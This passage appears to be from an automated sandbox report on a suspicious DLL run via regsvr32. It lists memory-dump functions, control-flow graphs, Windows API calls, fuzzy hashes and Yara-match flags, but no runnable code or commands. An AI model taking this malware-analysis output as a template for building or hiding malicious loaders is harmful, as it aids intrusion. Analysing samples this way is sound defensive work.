                                                                                                                                      • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                      • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                      • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %'#$'1O"
                                                                                                                                      • API String ID: 0-3508158491
                                                                                                                                      • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                                      • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                                                                                      • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                                      • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                      • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 153 7fffe2312154-7fffe2312160 154 7fffe23121e1-7fffe23121e3 153->154 155 7fffe2312162-7fffe231216b call 7fffe2314110 153->155 157 7fffe23121e5-7fffe23121ed 154->157 158 7fffe231221e-7fffe2312221 154->158 163 7fffe231216d-7fffe231216f 155->163 167 7fffe2312174-7fffe231217b call 7fffe2312fa0 155->167 162 7fffe23121f3-7fffe2312201 157->162 157->163 159 7fffe2312223-7fffe2312232 call 7fffe2312c88 call 7fffe2313108 158->159 160 7fffe2312279-7fffe231227c 158->160 180 7fffe2312237-7fffe231223d 159->180 164 7fffe2312285 160->164 165 7fffe231227e-7fffe2312280 call 7fffe2312f50 160->165 168 7fffe2312203 call 7fffe23136d0 162->168 169 7fffe2312208-7fffe231220b 162->169 170 7fffe231228a-7fffe231228f 163->170 164->170 165->164 181 7fffe2312184-7fffe23121a9 call 7fffe23140a0 GetCommandLineA call 7fffe2313eec call 7fffe2313758 167->181 182 7fffe231217d-7fffe2312182 call 7fffe231415c 167->182 168->169 169->164 175 7fffe231220d-7fffe231221c call 7fffe2313a48 call 7fffe2312c94 call 7fffe231415c 169->175 175->164 180->163 185 7fffe2312243-7fffe2312257 FlsSetValue 180->185 202 7fffe23121b2-7fffe23121b9 call 7fffe2313df4 181->202 203 7fffe23121ab-7fffe23121b0 call 7fffe2312c94 181->203 182->163 190 7fffe231226f-7fffe2312274 call 7fffe2313024 185->190 191 7fffe2312259-7fffe231226d call 7fffe2312cbc GetCurrentThreadId 185->191 190->163 191->164 208 7fffe23121da-7fffe23121df call 7fffe2313a48 202->208 209 7fffe23121bb-7fffe23121c2 call 7fffe2313aec 202->209 203->182 208->203 209->208 214 7fffe23121c4-7fffe23121c6 call 7fffe231347c 209->214 216 7fffe23121cb-7fffe23121cd 214->216 216->208 217 7fffe23121cf-7fffe23121d5 216->217 217->164
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00007FFFE2314110: HeapCreate.KERNELBASE(?,?,?,?,00007FFFE2312169), ref: 00007FFFE2314122
                                                                                                                                        • Part of subcall function 00007FFFE2314110: HeapSetInformation.KERNEL32 ref: 00007FFFE231414C
                                                                                                                                      • _RTC_Initialize.LIBCMT ref: 00007FFFE2312184
                                                                                                                                      • GetCommandLineA.KERNEL32 ref: 00007FFFE2312189
                                                                                                                                        • Part of subcall function 00007FFFE2313EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFFE231219B), ref: 00007FFFE2313F1B
                                                                                                                                        • Part of subcall function 00007FFFE2313EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFFE231219B), ref: 00007FFFE2313F5B
                                                                                                                                        • Part of subcall function 00007FFFE2313758: GetStartupInfoA.KERNEL32 ref: 00007FFFE231377D
                                                                                                                                      • __setargv.LIBCMT ref: 00007FFFE23121B2
                                                                                                                                      • _cinit.LIBCMT ref: 00007FFFE23121C6
                                                                                                                                        • Part of subcall function 00007FFFE2312C94: FlsFree.KERNEL32(?,?,?,?,00007FFFE2312217), ref: 00007FFFE2312CA3
                                                                                                                                        • Part of subcall function 00007FFFE2312C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFFE2312217), ref: 00007FFFE2316A32
                                                                                                                                        • Part of subcall function 00007FFFE2312C94: free.LIBCMT ref: 00007FFFE2316A3B
                                                                                                                                        • Part of subcall function 00007FFFE2312C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFFE2312217), ref: 00007FFFE2316A5B
                                                                                                                                        • Part of subcall function 00007FFFE2313108: Sleep.KERNEL32(?,?,0000000A,00007FFFE2312DA3,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231314D
                                                                                                                                      • FlsSetValue.KERNEL32 ref: 00007FFFE231224C
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFFE2312260
                                                                                                                                      • free.LIBCMT ref: 00007FFFE231226F
                                                                                                                                        • Part of subcall function 00007FFFE2313024: HeapFree.KERNEL32(?,?,00000000,00007FFFE2312DDC,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231303A
                                                                                                                                        • Part of subcall function 00007FFFE2313024: _errno.LIBCMT ref: 00007FFFE2313044
                                                                                                                                        • Part of subcall function 00007FFFE2313024: GetLastError.KERNEL32(?,?,00000000,00007FFFE2312DDC,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231304C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1549890855-0
                                                                                                                                      • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                                      • Instruction ID: 3bcb17aa921377d46c0fc24e2dab2be203961c0fa2c52f51a5297593aa862e39
                                                                                                                                      • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                                      • Instruction Fuzzy Hash: 7331BE21E0C2234DFAB8A7A168023BD61D56FB5750F1481F6DA1DF52C6FEACA4464E13
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • _getptd.LIBCMT ref: 00007FFFE2314CF3
                                                                                                                                        • Part of subcall function 00007FFFE231497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFFE2314D0E,?,?,?,?,?,00007FFFE2314EE3), ref: 00007FFFE23149A6
                                                                                                                                        • Part of subcall function 00007FFFE231309C: Sleep.KERNEL32(?,?,00000000,00007FFFE2316B19,?,?,00000000,00007FFFE2316BC3,?,?,?,?,?,?,00000000,00007FFFE2312DC8), ref: 00007FFFE23130D2
                                                                                                                                      • free.LIBCMT ref: 00007FFFE2314D7F
                                                                                                                                        • Part of subcall function 00007FFFE2313024: HeapFree.KERNEL32(?,?,00000000,00007FFFE2312DDC,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231303A
                                                                                                                                        • Part of subcall function 00007FFFE2313024: _errno.LIBCMT ref: 00007FFFE2313044
                                                                                                                                        • Part of subcall function 00007FFFE2313024: GetLastError.KERNEL32(?,?,00000000,00007FFFE2312DDC,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231304C
                                                                                                                                      • _lock.LIBCMT ref: 00007FFFE2314DB7
                                                                                                                                      • free.LIBCMT ref: 00007FFFE2314E67
                                                                                                                                      • free.LIBCMT ref: 00007FFFE2314E97
                                                                                                                                      • _errno.LIBCMT ref: 00007FFFE2314E9C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1264244385-0
                                                                                                                                      • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                                      • Instruction ID: 014d4bcdfccca08a2501d4279f802e9b76f08684d2b14f74b7d8794284d0de19
                                                                                                                                      • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                                      • Instruction Fuzzy Hash: 3E518222D086824AE7549B65940037AB7E1FFA4B54F2441B7D65EA3395EFBCE401CF12
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 502529563-0
                                                                                                                                      • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                                      • Instruction ID: 7a0af376a7b32f5192def31d50bd2a334cf0e857cd2f0f8a04833bdc358f099e
                                                                                                                                      • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                                      • Instruction Fuzzy Hash: 1C114F21E0974289FA115BA1A81037A23D0EFE4B90F1441B2E91DA67C3EFACE4508F13
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                                                                                      • String ID: vb4vcW2kAW3Twaz?30
                                                                                                                                      • API String ID: 254689257-4179232793
                                                                                                                                      • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                                      • Instruction ID: 776e8c4cbd09c48e2dd303f97471aa7ba8a02f6219f48196f030d928a2e111fc
                                                                                                                                      • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                                      • Instruction Fuzzy Hash: D4210532A0CEC28AE3708B14E4543AA77E5FB98744F4446B5CACD97765EFBDA5018F01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00007FFFE23136F0: _initp_misc_winsig.LIBCMT ref: 00007FFFE2313729
                                                                                                                                        • Part of subcall function 00007FFFE23136F0: EncodePointer.KERNEL32(?,?,?,00007FFFE2312FAB,?,?,?,00007FFFE2312179), ref: 00007FFFE2313745
                                                                                                                                      • FlsAlloc.KERNEL32(?,?,?,00007FFFE2312179), ref: 00007FFFE2312FBB
                                                                                                                                        • Part of subcall function 00007FFFE2313108: Sleep.KERNEL32(?,?,0000000A,00007FFFE2312DA3,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231314D
                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFFE2312179), ref: 00007FFFE2312FEC
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFFE2313000
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 54287522-0
                                                                                                                                      • Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                                                                                      • Instruction ID: 226e8e5bcb443fe5883ddf09fb6a07ccdb4f867b90713a34f7b58763415c6fa0
                                                                                                                                      • Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                                                                                      • Instruction Fuzzy Hash: 95012C21E0850349FB24AB719805778A2E16F64760F1442B5D52EF62E5FFACE4859E23
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 618 180001bdc-180001cab call 1800142a0 621 180001d21-180001d64 CreateProcessW 618->621 622 180001cad-180001d1b call 18000dd70 618->622 622->621
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateProcess
                                                                                                                                      • String ID: :}
                                                                                                                                      • API String ID: 963392458-2902022129
                                                                                                                                      • Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                                                                                      • Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
                                                                                                                                      • Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                                                                                      • Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExitProcess
                                                                                                                                      • String ID: JKvDDasqwOPvGXZdqW
                                                                                                                                      • API String ID: 621844428-4059861069
                                                                                                                                      • Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                                                                                      • Instruction ID: a485d227f34d7bf77d2d318def832239f604a82f82c56a359cd32172f93f93b4
                                                                                                                                      • Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                                                                                      • Instruction Fuzzy Hash: ECD09E22D18A8181D620A750E80535A63E0BBD9745FC00170D58C96614EFBCD156CF15
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _errno.LIBCMT ref: 00007FFFE2316D0F
                                                                                                                                        • Part of subcall function 00007FFFE23166D8: DecodePointer.KERNEL32 ref: 00007FFFE23166FF
                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FFFE231313B,?,?,0000000A,00007FFFE2312DA3,?,?,?,00007FFFE2312DFF), ref: 00007FFFE2316D58
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateDecodeHeapPointer_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 15861996-0
                                                                                                                                      • Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                                                                                      • Instruction ID: e03a41b0a55c2be41e1431bf491c6348add3e21426ba186c339c261f5d8855af
                                                                                                                                      • Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                                                                                      • Instruction Fuzzy Hash: AC11C422F092424AFB155B66E60437963D19FA47D4F288A77CA1D966C6FFECA4008E02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _initp_misc_winsig.LIBCMT ref: 00007FFFE2313729
                                                                                                                                        • Part of subcall function 00007FFFE231755C: EncodePointer.KERNEL32(?,?,?,?,00007FFFE231373E,?,?,?,00007FFFE2312FAB,?,?,?,00007FFFE2312179), ref: 00007FFFE2317567
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFFE2312FAB,?,?,?,00007FFFE2312179), ref: 00007FFFE2313745
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EncodePointer$_initp_misc_winsig
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 190222155-0
                                                                                                                                      • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                                      • Instruction ID: 4a7c55bfb02002f69be514a02f23d26a4e0f4bad6683894da10bef954b40410f
                                                                                                                                      • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                                      • Instruction Fuzzy Hash: EDF02E10E492474CE919B7626C522B852C04FB6B80B5C10F2E91EAA393FEACE5558F56
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$CreateInformation
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1774340351-0
                                                                                                                                      • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                                      • Instruction ID: aab62c1243142e5a9bed366d4e83c75b2c5f0f4e114828ffdb8f6bc1d870b98f
                                                                                                                                      • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                                      • Instruction Fuzzy Hash: F4E0DF76E257918AE7989B21A809B6522A0FBA8340F805079EA4D92794EF7CD0468E00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFFE23134AF,?,?,?,00007FFFE23121CB), ref: 00007FFFE231740D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EncodePointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2118026453-0
                                                                                                                                      • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                                      • Instruction ID: 997836ef76e01ed3af4c118262953c413b2510b6d90ba006e9b2948cf0f57987
                                                                                                                                      • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                                      • Instruction Fuzzy Hash: 67D02B33F1458185DB108B20F48036C23E0EB94794F188031D60C03204EE3CC456CB01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(?,?,0000000A,00007FFFE2312DA3,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231314D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
